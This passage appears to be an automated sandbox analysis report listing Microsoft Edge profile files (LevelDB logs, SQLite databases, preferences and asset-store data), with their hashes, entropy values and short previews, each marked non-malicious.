                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):315
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.286514394753664
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0z41cNwi23oH+Tcwtp3hBtB2KLlVCe0Z+q2PcNwi23oH+Tcwtp3hBWsIFUv:fcaZYebp3dFLnU+vLZYebp3eFUv
                                                                                                                                                                                                                                                                                                                    MD5:FA090EF41E8787E924B1194E38A6D0F4
                                                                                                                                                                                                                                                                                                                    SHA1:7F9BC1807A00A9AC39A31D7442315D0B4A771E13
                                                                                                                                                                                                                                                                                                                    SHA-256:2F81DF43734D561283B27A860BB8DA8F36688E77B7FA5D750EC6FA053A3F4DFB
                                                                                                                                                                                                                                                                                                                    SHA-512:5BFA00D68B06417E905753EF7D9CBCA9BD0E97FD82CA7EA9E336ABE8212C45FE5CC527BCE415F6D6F2621EEA70EE061B7E382B06952C66B4B7A8769559B47712
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:18.579 204c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/27-04:49:18.693 204c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):1696115
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.040622383247104
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:kmf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kmfgAmmE
                                                                                                                                                                                                                                                                                                                    MD5:7F1CE767BF201E52DBCF8E8594B0AD7B
                                                                                                                                                                                                                                                                                                                    SHA1:9F9127141BA3145407140F9761F210563F4E7708
                                                                                                                                                                                                                                                                                                                    SHA-256:544289C21FA31080651A78F7FB97458A27F1C62AD94C7468929F77205AE2B8F7
                                                                                                                                                                                                                                                                                                                    SHA-512:AC723356B84CCD1E98D096EA7DC5727FBF822263861B2973BA5FA1299E5633DF4C9D5CA683950EE4C17C017C9D00495B1CAECADEDF2B00E6FC3EF69179EE81AA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163918655837289
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe01RFlQ+q2PcNwi23oH+Tcwt9Eh1tIFUt8YCe01/VgZmw+YCe010QVkwOcNwiH:fclVvLZYeb9Eh16FUt882Vg/+8xI54Zw
                                                                                                                                                                                                                                                                                                                    MD5:2C886463379F72B59782F71476FFD24E
                                                                                                                                                                                                                                                                                                                    SHA1:68FC314BDC9375C0560868D4F0BE6D7C3D38BCF0
                                                                                                                                                                                                                                                                                                                    SHA-256:D25971E6B8F994EA6638BC8224A1E148EAF90BABF5A53FCE96CD828D130970B8
                                                                                                                                                                                                                                                                                                                    SHA-512:BDB7C87B7B8AB00A6A96B56CADF8E74797DDA5AE5B5BC223CFABA9C708F77DF4A12756997E3EDC268C0CDEA671C412B0060C8E92C6BFEB407193CEE8FF2D5D93
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:18.386 20a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/27-04:49:18.391 20a8 Recovering log #3.2024/11/27-04:49:18.394 20a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163918655837289
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe01RFlQ+q2PcNwi23oH+Tcwt9Eh1tIFUt8YCe01/VgZmw+YCe010QVkwOcNwiH:fclVvLZYeb9Eh16FUt882Vg/+8xI54Zw
                                                                                                                                                                                                                                                                                                                    MD5:2C886463379F72B59782F71476FFD24E
                                                                                                                                                                                                                                                                                                                    SHA1:68FC314BDC9375C0560868D4F0BE6D7C3D38BCF0
                                                                                                                                                                                                                                                                                                                    SHA-256:D25971E6B8F994EA6638BC8224A1E148EAF90BABF5A53FCE96CD828D130970B8
                                                                                                                                                                                                                                                                                                                    SHA-512:BDB7C87B7B8AB00A6A96B56CADF8E74797DDA5AE5B5BC223CFABA9C708F77DF4A12756997E3EDC268C0CDEA671C412B0060C8E92C6BFEB407193CEE8FF2D5D93
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:18.386 20a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/27-04:49:18.391 20a8 Recovering log #3.2024/11/27-04:49:18.394 20a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46249877932499556
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuC0:TouQq3qh7z3bY2LNW9WMcUvBuC0
                                                                                                                                                                                                                                                                                                                    MD5:67C5D08F0D552CBB9D651C4AAFEE6564
                                                                                                                                                                                                                                                                                                                    SHA1:49CE2DD712CA2916325F9BDD62A240E780E0615C
                                                                                                                                                                                                                                                                                                                    SHA-256:D548B3D3E12F14579EE5BFDCB79A5EEDFF7B25C492520B06A546D565E2366A61
                                                                                                                                                                                                                                                                                                                    SHA-512:FFD2572BDB9165DED18BC4696AA08556B00A44CF7040244F9861173C151B578DC7B91D711061B3642B548A6A12116BA5A885D291DEF6B2C076CFCF0CD7DCDF85
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):351
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.225373677670036
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dh+q2PcNwi23oH+TcwtnG2tMsIFUt8YCe0ddZmw+YCe0dqVkwOcNwi23oH+V:fyh+vLZYebn9GFUt88yd/+8yqV54ZYeV
                                                                                                                                                                                                                                                                                                                    MD5:6494DD219A1CBEF7916558FA837EC801
                                                                                                                                                                                                                                                                                                                    SHA1:BFCA3BEE84A44D6D44ED7B4E2FB48AFFDC9A4401
                                                                                                                                                                                                                                                                                                                    SHA-256:AEECE17B75044C550352811B280EF5CD5FE7FCFE6B54F36FA2C149A4BA904590
                                                                                                                                                                                                                                                                                                                    SHA-512:283E2FC38D3786DE198F189B6BD8D47CD6F7DD37CA484F018BBC15119CA83ED2978A401E9C306C43CC871325EA6F978F7EE50A06CA6F5E76F91AEA79A4A55BD5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.183 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/27-04:49:12.183 bdc Recovering log #3.2024/11/27-04:49:12.184 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):351
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.225373677670036
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dh+q2PcNwi23oH+TcwtnG2tMsIFUt8YCe0ddZmw+YCe0dqVkwOcNwi23oH+V:fyh+vLZYebn9GFUt88yd/+8yqV54ZYeV
                                                                                                                                                                                                                                                                                                                    MD5:6494DD219A1CBEF7916558FA837EC801
                                                                                                                                                                                                                                                                                                                    SHA1:BFCA3BEE84A44D6D44ED7B4E2FB48AFFDC9A4401
                                                                                                                                                                                                                                                                                                                    SHA-256:AEECE17B75044C550352811B280EF5CD5FE7FCFE6B54F36FA2C149A4BA904590
                                                                                                                                                                                                                                                                                                                    SHA-512:283E2FC38D3786DE198F189B6BD8D47CD6F7DD37CA484F018BBC15119CA83ED2978A401E9C306C43CC871325EA6F978F7EE50A06CA6F5E76F91AEA79A4A55BD5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.183 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/27-04:49:12.183 bdc Recovering log #3.2024/11/27-04:49:12.184 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6126908886842809
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jFF6p/FjWmL:TO8D4jJ/6Up+y
                                                                                                                                                                                                                                                                                                                    MD5:B493E31590F1E7FDEAB44B183FCEDE2E
                                                                                                                                                                                                                                                                                                                    SHA1:FB64D762FB1D0ACC99CDBFAEDC5BD55EFD141CAE
                                                                                                                                                                                                                                                                                                                    SHA-256:8C9AE12BFEB3B2FA8196AE42497EA2EAC475C32D0DB6A2C920FDA5490D881210
                                                                                                                                                                                                                                                                                                                    SHA-512:F7BD877EAD5D0CF9669E5614C426F956D59FEBECDDC6030CDB5A100443735D9786E26698B661C27D1176579A0F4869BAAE42C1463B31F78ECCF3DCD6B4DB1E83
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354144920494961
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:lA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:lFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                    MD5:151C4E0F92FA6E587037EAB18C4F8D8C
                                                                                                                                                                                                                                                                                                                    SHA1:165C594FD91E740C6CB0AA45AFE0B0B8B626711F
                                                                                                                                                                                                                                                                                                                    SHA-256:71664A559955EADD9D283F4F906BD484EA8B95D394742EFCF2954F61DED2C2A0
                                                                                                                                                                                                                                                                                                                    SHA-512:B31E255870DB149B441047AEE340FA08AE246C827D6A15BA55B9D1D81BB6F2DFD8886E6263307AC0EFA0AA6990A735270A411DA55FACCBC035B2E8CCA7D9E9F9
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1U...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377174561505329..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):317
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.19068328753056
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0JG81cNwi23oH+Tcwtk2WwnvB2KLlVCe0zm3+q2PcNwi23oH+Tcwtk2WwnvIg:fMZYebkxwnvFLncmOvLZYebkxwnQFUv
                                                                                                                                                                                                                                                                                                                    MD5:CF4C200BA4BC8839EE7BDA83C2141E72
                                                                                                                                                                                                                                                                                                                    SHA1:46B268BFD384C3EE2D6F5C63348E0FF28CFE833B
                                                                                                                                                                                                                                                                                                                    SHA-256:EDB1C55E9E464F643F1E27E4020C89A4EE384C45D9824DBC3AF9AE808BCEB045
                                                                                                                                                                                                                                                                                                                    SHA-512:34584ED39201B2E58564DDF29BF04A7A3F45A289402D2FA084D32453D732F109CA5DB65B514BD7F3A6BCAC8B686F9B7D122EFB46815F8E8238B15FCE4AABED7F
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:18.430 20d8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/27-04:49:18.503 20d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):358860
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324609842631148
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R/:C1gAg1zfvH
